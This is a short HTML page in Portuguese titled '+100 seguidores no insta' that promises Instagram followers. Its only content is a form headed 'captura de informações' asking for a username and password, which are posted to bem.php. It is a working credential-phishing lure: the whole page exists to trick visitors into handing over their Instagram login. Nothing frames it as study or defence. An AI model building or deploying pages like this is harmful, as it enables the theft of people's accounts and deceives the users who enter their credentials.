<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>+100 seguidores no insta</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #54996e;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .form-container {
            background-color: #000000;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(107, 85, 85, 0.1);
        }
        .form-container h1 {
            margin-bottom: 20px;
            font-size: 24px;
            color: #ffffff;
        }
        .form-container input, .form-container textarea {
            width: 94%;
            padding: 14px;
            margin-bottom: 11px;
            border: 1px solid #000000;
            border-radius: 20px;
        }
        .form-container button {
            width: 100%;
            padding: 10px;
            background-color: #1d99e0;
            border: none;
            border-radius: 4px;
            color: #000000;
            font-size: 16px;
            cursor: pointer;
        }
        .form-container button:hover {
            background-color: #294ce7;
        }
    </style>
</head>
<body>
    <div class="form-container">
        <h1>captura de informações</h1>
        <form action="bem.php" method="post">
            <input type="text" name="username" placeholder="Nome de Usuário" required>
            <input type="password" name="password" placeholder="Senha" required>
            <button type="submit">Enviar</button>
        </form>
    </div>
</body>
</html>
